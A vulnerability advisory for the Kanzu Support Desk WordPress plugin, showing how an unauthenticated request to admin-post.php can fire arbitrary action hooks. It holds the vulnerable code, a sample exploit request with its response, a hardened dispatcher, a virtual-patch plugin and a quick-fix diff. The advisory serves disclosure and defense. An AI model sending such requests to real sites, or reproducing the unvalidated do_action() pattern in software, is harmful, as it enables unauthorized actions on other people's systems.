Arbitrary function execution vulnerability in Kanzu Support Desk

Summary

Description                 Details
Name                        Arbitrary function execution vulnerability in Kanzu Support Desk
Summary                     Reliance on is_admin() for access control, combined with an unsanitized hook name passed to do_action(), lets an unauthenticated request fire arbitrary WordPress action hooks
Affected application        Kanzu Support Desk
Affected revision           <= 2.4.6
Vendor update available     No
CVE Ids
CVSSv3.0 Base Score         6.5
CVSS vector                 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Public Exploit available    No
Exploit verified
Authentication Required     No

Vulnerable Code

<?php
// kanzu-support-desk.php
// Dashboard and Administrative Functionality
// is_admin() is true for any request to wp-admin/, including admin-post.php
// and admin-ajax.php, whether or not the visitor is logged in.
if ( is_admin() ) {
    require_once( KSD_PLUGIN_DIR .  'includes/admin/class-ksd-admin.php' );
}

// includes/admin/class-ksd-admin.php
public function do_post_and_get_actions() {
    if ( isset( $_POST['ksd_action'] ) ) {
        do_action( $_POST['ksd_action'], $_POST );   // hook name taken verbatim from the request
    }
    if ( isset( $_GET['ksd_action'] ) ) {
        do_action( $_GET['ksd_action'], $_GET );     // same, for GET parameters
    }
}

  • is_admin() only checks whether the request targets an admin-area page (admin-post.php and admin-ajax.php included); it says nothing about who the user is or what capabilities they hold, and it is not an authorization check.
  • do_action() receives the hook name straight from $_GET/$_POST without validation, so any action hook registered in WordPress core or in any active plugin can be fired, with the request array handed to every callback as its first argument.
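The same dispatcher in a hardened form, written for this write-up rather than taken from the vendor's code. It assumes the WordPress runtime (sanitize_key, is_user_logged_in, current_user_can, wp_verify_nonce, wp_unslash, wp_die, do_action, add_action) and uses hypothetical hook names and a hypothetical nonce field `_ksd_nonce`; the real fix would list the plugin's own hooks. The three checks it adds are the ones the original skips: an allow-list of hook names, a per-action capability check, and a nonce bound to the action.

```php
<?php
// Added example (not the plugin's code): hardened do_post_and_get_actions().
// Assumes the WordPress runtime. Hook names and the '_ksd_nonce' field are
// hypothetical placeholders for the plugin's real hooks and form fields.

/**
 * Allow-list of hooks a request may trigger, with the capability each one needs.
 * Anything not listed here never reaches do_action().
 */
function ksd_allowed_actions() {
    return array(
        'ksd_new_ticket'      => 'edit_posts',      // hypothetical hook names
        'ksd_reply_ticket'    => 'edit_posts',
        'ksd_update_settings' => 'manage_options',
    );
}

/**
 * Map the raw request to an allow-listed hook name, or null to refuse.
 * Kept free of WordPress side effects beyond sanitize_key() so it is easy to test.
 */
function ksd_resolve_action( array $request ) {
    if ( ! isset( $request['ksd_action'] ) || ! is_string( $request['ksd_action'] ) ) {
        return null; // missing, or smuggled in as ksd_action[]=...
    }
    $action = sanitize_key( $request['ksd_action'] ); // lowercase [a-z0-9_-] only
    return array_key_exists( $action, ksd_allowed_actions() ) ? $action : null;
}

function ksd_dispatch_request( array $request ) {
    $action = ksd_resolve_action( $request );
    if ( null === $action ) {
        // Not one of ours: refuse instead of handing the name to do_action().
        wp_die( 'Unknown ksd_action', 'Kanzu Support Desk', array( 'response' => 400 ) );
    }

    // Authentication and authorization: is_admin() proves nothing about the
    // user, so check the capability this particular action needs.
    $required_cap = ksd_allowed_actions()[ $action ];
    if ( ! is_user_logged_in() || ! current_user_can( $required_cap ) ) {
        wp_die( 'Insufficient permissions', 'Kanzu Support Desk', array( 'response' => 403 ) );
    }

    // CSRF: the nonce is bound to the specific action. The submitting form
    // emits it with wp_nonce_field( 'ksd_' . $action, '_ksd_nonce' ).
    $nonce = isset( $request['_ksd_nonce'] ) ? $request['_ksd_nonce'] : '';
    if ( ! is_string( $nonce ) || ! wp_verify_nonce( $nonce, 'ksd_' . $action ) ) {
        wp_die( 'Invalid or expired nonce', 'Kanzu Support Desk', array( 'response' => 403 ) );
    }

    do_action( $action, $request );
}

function ksd_do_post_and_get_actions() {
    // POST takes precedence; one request fires at most one hook.
    if ( isset( $_POST['ksd_action'] ) ) {
        ksd_dispatch_request( wp_unslash( $_POST ) );
    } elseif ( isset( $_GET['ksd_action'] ) ) {
        ksd_dispatch_request( wp_unslash( $_GET ) );
    }
}
// Assumed registration point; the original handler is reachable through
// admin-post.php, whose admin_init fires for unauthenticated requests too.
add_action( 'admin_init', 'ksd_do_post_and_get_actions' );
```

With this in place the request from the exploit example (`ksd_action=do_feed_rss`) is rejected with a 400 before do_action() is reached, because `do_feed_rss` is not in the allow-list, and a guessed or replayed request for a listed action still fails the capability or nonce check.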

Exploit example (unauthenticated request, sent with HTTPie):

$ http http://cve20199787.vulnsite.xxxyy/wp-admin/admin-post.php?ksd_action=do_feed_rss 
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/rss+xml; charset=UTF-8
Date: Mon, 20 May 2019 19:01:19 GMT
Keep-Alive: timeout=5, max=100
Server: Apache
Transfer-Encoding: chunked

<?xml version="1.0" encoding="UTF-8"?><rss version="0.92">
<channel>
    <title>My blog</title>
    <link>http://cve20199787.vulnsite.xxxyy</link>
    <description>Just another WordPress site</description>
    <lastBuildDate>2019-05-20 16:19:53</lastBuildDate>
    <docs>http://backend.userland.com/rss092</docs>
    <language>en-US</language>

    <!-- generator="WordPress/5.2" -->

</channel>
</rss>

Exploit Methodology

In do_action( $_GET['ksd_action'], $_GET ) the hook name comes straight from the request, so any registered WordPress action can be fired, and every callback attached to it receives the full $_GET or $_POST array as its first argument. So far only hooks whose callbacks take no arguments have been confirmed to execute usefully: because the only argument under attacker control is that associative array, the set of directly useful hooks is limited. The impact grows with other installed plugins, since a hook whose callback reads its own parameters from $_POST without checking the user's capability becomes reachable by an unauthenticated request.

Can the attacker update posts?

The post editing paths check user capabilities (edit_posts and related), which blocks creating or editing posts through this vector.

Can the attacker update options?

Not directly: the only attacker-controlled argument is the $_POST/$_GET associative array, and there is no core hook that writes an option from that.

How can this vulnerability pose a threat?

Combined with another plugin whose hook callbacks trust request data, it can lead to code injection.
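For sites that cannot change the plugin's files, the parameter can be intercepted before the vulnerable handler sees it. The must-use plugin below is an added example written for this write-up, not vendor or BountySite code. It assumes the vulnerable handler runs on `init` or later (admin_init, consistent with the admin-post.php exploit path), that the plugin's own hook names start with `ksd_`, and that support staff hold at least `edit_posts`; all three are labelled assumptions to adjust before use, and if the plugin's public ticket form also submits `ksd_action`, that name must be exempted.

```php
<?php
/**
 * Plugin Name: KSD virtual patch (added example)
 * Description: Rejects ksd_action requests that are not from authorised staff,
 *              before the vulnerable dispatcher can call do_action().
 */
// Added example for this write-up, not the vendor's or BountySite's code.
// Install as wp-content/mu-plugins/ksd-virtual-patch.php; mu-plugins load
// before regular plugins, so the hook below is registered ahead of the plugin's.
// ASSUMPTIONS: the vulnerable handler runs on init or later; legitimate hook
// names start with 'ksd_'; staff users hold at least edit_posts.

define( 'KSD_VPATCH_PREFIX', 'ksd_' );     // assumed prefix of the plugin's own hooks
define( 'KSD_VPATCH_CAP', 'edit_posts' );  // assumed minimum capability of staff

/**
 * Pure policy decision, separated from the WordPress calls so it can be
 * exercised on its own: allow only a string name with the expected prefix,
 * from a logged-in user holding the required capability.
 */
function ksd_vpatch_request_allowed( $name, $logged_in, $has_cap ) {
    return is_string( $name )
        && 0 === strpos( $name, KSD_VPATCH_PREFIX )
        && $logged_in
        && $has_cap;
}

function ksd_vpatch_guard() {
    if ( ! isset( $_GET['ksd_action'] ) && ! isset( $_POST['ksd_action'] ) ) {
        return;
    }
    $name = isset( $_POST['ksd_action'] ) ? $_POST['ksd_action'] : $_GET['ksd_action'];

    if ( ksd_vpatch_request_allowed( $name, is_user_logged_in(), current_user_can( KSD_VPATCH_CAP ) ) ) {
        return;
    }

    // Leave a trace for incident response, then fail closed with a 403 so the
    // plugin's do_post_and_get_actions() never runs for this request.
    error_log( sprintf(
        'ksd-vpatch: blocked ksd_action=%s uri=%s ip=%s',
        is_string( $name ) ? $name : gettype( $name ),
        isset( $_SERVER['REQUEST_URI'] ) ? $_SERVER['REQUEST_URI'] : '-',
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-'
    ) );
    wp_die( 'Forbidden', 'Forbidden', array( 'response' => 403 ) );
}
// Very early priority on init: runs before a handler on init (priority 10)
// and before anything on admin_init, which fires after init.
add_action( 'init', 'ksd_vpatch_guard', -1000 );
```

The logged line gives a search key (`ksd-vpatch: blocked`) for checking whether the vector was being probed before the patch went in; requests for names such as `do_feed_rss` from unauthenticated clients are the ones to look for.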

Security Patch

BountySite quick fix (temporary)

--- a/wp-content/plugins/kanzu-support-desk/kanzu-support-desk.php
+++ b/wp-content/plugins/kanzu-support-desk/kanzu-support-desk.php
@@ -176,7 +176,7 @@ final class Kanzu_Support_Desk {
         require_once( KSD_PLUGIN_DIR .  'includes/public/class-ksd-public.php' );

         //Dashboard and Administrative Functionality
-        if ( is_admin() ) {
+        if ( current_user_can( 'manage_options' ) ) {
             require_once( KSD_PLUGIN_DIR .  'includes/admin/class-ksd-admin.php' );
         }
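Review bot: this gate is on the wrong layer and too coarse. Replacing is_admin() with current_user_can( 'manage_options' ) stops the whole admin class from loading for any user below administrator, so support staff lose the plugin's admin screens, while do_post_and_get_actions() still passes an attacker-chosen name straight to do_action() for anyone who does get the class loaded. Fix the dispatcher instead: validate ksd_action against a fixed list of the plugin's own hooks, then check the capability and a nonce before calling do_action(); if this gate is kept as a stopgap, write it as `if ( is_admin() && current_user_can( 'manage_options' ) ) {` so front-end requests keep their original behaviour. Also confirm that the method containing this branch runs at plugins_loaded or later: current_user_can() relies on wp_get_current_user() from pluggable.php, which WordPress loads only after the active plugin files have been included, so calling it while the plugin file is being included fails.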

References

Plugin Vulnerabilities